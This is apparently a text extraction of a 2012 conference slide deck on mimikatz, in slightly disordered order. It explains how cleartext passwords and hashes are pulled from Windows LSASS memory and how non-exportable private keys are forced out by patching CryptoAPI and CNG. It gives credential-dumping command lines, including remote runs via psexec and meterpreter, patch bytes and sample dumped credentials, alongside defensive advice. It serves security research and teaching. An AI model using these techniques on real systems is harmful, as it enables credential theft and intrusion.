Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
